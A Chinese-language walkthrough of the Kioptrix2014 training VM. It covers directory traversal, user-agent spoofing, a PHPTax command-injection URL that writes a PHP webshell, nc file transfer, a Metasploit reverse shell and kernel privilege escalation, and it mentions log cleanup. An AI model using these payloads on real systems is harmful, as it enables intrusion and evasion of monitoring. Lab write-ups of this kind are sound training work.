Kioptrix2014靶机渗透

前言

前言想了很久怎么写，怎么说呢，这个靶机说是给beginer的，确实如此，没有太复杂的操作弯弯绕，但我认为它也是给一个有追求的beginer的。就像最后作者所言，任何人都能够拿出大把的exp(攻击荷载)，并希望能够’奏效’,但这种不加思考的尝试势必会造成系统内大量的日志记录，进而系统告警，结果可能是渗透失败。所以最自如的状态是信息搜集&研究信息之间的关联（information gathering & research）。受益匪浅。贴上作者的原文：

If you are reading this, it means you got root (or cheated).
Congratulations either way...

Hope you enjoyed this new VM of mine. As always, they are made for the beginner in 
mind, and not meant for the seasoned pentester. However this does not mean one can't enjoy them.
As with all my VMs, besides getting "root" on the system, the goal is to also
learn the basics skills needed to compromise a system. Most importantly, in my mind,
are information gathering & research. Anyone can throw massive amounts of exploits
and "hope" it works, but think about the traffic.. the logs... Best to take it
slow, and read up on the information you gathered and hopefully craft better
more targetted attacks. 

For example, this system is FreeBSD 9. Hopefully you noticed this rather quickly.
Knowing the OS gives you any idea of what will work and what won't from the get go.
Default file locations are not the same on FreeBSD versus a Linux based distribution.
Apache logs aren't in "/var/log/apache/access.log", but in "/var/log/httpd-access.log".
It's default document root is not "/var/www/" but in "/usr/local/www/apache22/data".
Finding and knowing these little details will greatly help during an attack. Of course
my examples are specific for this target, but the theory applies to all systems.
As a small exercise, look at the logs and see how much noise you generated. Of course
the log results may not be accurate if you created a snapshot and reverted, but at least
it will give you an idea. For fun, I installed "OSSEC-HIDS" and monitored a few things.
Default settings, nothing fancy but it should've logged a few of your attacks. Look at the following files:
/root/folderMonitor.log
/root/httpd-access.log (softlink)
/root/ossec-alerts.log (softlink)

The folderMonitor.log file is just a cheap script of mine to track created/deleted and modified
files in 2 specific folders. Since FreeBSD doesn't support "iNotify", I couldn't use OSSEC-HIDS 
for this.
The httpd-access.log is rather self-explanatory .
Lastly, the ossec-alerts.log file is OSSEC-HIDS is where it puts alerts when monitoring certain
files. This one should've detected a few of your web attacks.

Feel free to explore the system and other log files to see how noisy, or silent, you were.
And again, thank you for taking the time to download and play.
Sincerely hope you enjoyed yourself.
Be good...
loneferret

详细过程

信息搜集

1. 端口扫描，80，8080端口开放

   

2. 80端口打开没啥东西，习惯性查看源码，应该是什么cms版本，试着访问一下，另有乾坤。8080端口403。

   

3. 搜索漏洞，存在文件包含

   

   [1] Directory Traversal:
   "hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd"
   

4. 验证确实可以包含文件，那么还是两种思路，要么可以将payload写入系统日志，包含出来，执行代码，要么可造成信息泄露，进行下一步渗透。这里有一个问题是Freebsd系统文件位置和其他发行版Linux文件位置有差异。搜索Freebsd apache查看一些配置文章，了解到apache配置文件位置

   

5. 这样包含日志文件，发现8080端口信息。只允许UA为火狐4.0访问。因此修改UA。（插件很多不赘述）

   

6. 修改后访问8080端口发现能够访问。

   

getshell

7. 网页写着phptax,searchexp看一下.存在远程命令执行。

   

8. 首先验证

   paylaod
   http://192.168.43.192:8080/phptax/drawimage.php?pfilez=xxx;%20ifconfig%20%3E%20ip.txt;&pdf=make
   

   

9. 存在漏洞，那么我们可以写webshell，或者直接使用msf。这里演示如何写webshell

   payload:
   http://192.168.43.192:8080/phptax/drawimage.php?pfilez=xxx;echo%20%22%3C?php%20system(%5C$_GET%5B%27m%27%5D);%20?%3E%22%20%3E%20ips.php;&pdf=make
   
   
   

   注意$ 前转义符号\即%5C。

   

10. 方便起见我们还是用msf来反弹shell。

    

提权

11. 其实在之前getshell的时候就发现系统没有安装wget，curl等，于是出现问题就是我怎么把提权脚本传上来。当然最简单的方法是在靶机上种上meterpreter，使用upload命令上传。但就如开头所言，我们要避免告警。庆幸系统存在nc，可以使用重定向符号进行文件传递。

    服务端 
    nc -lvvp 9999 < exp.c
    
    客户端
    nc -nv 192.168.43.86 9999 >  exp.c
    

    nv参数不输也可以。
    当然在nc连接后断开连接客户端即可接受文件。

12. 首先查询内核发现为FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE,可进行内核提权。

    

13. 提权

    

最后

日志里存在大量的记录，很大一部分为前期的目录扫描遗留，实际环境可以进行日志清理，但问题是前期扫描目录就发现不一会就页面返回错误，说明是被安全进程检测到了。看来要杜绝无脑扫描。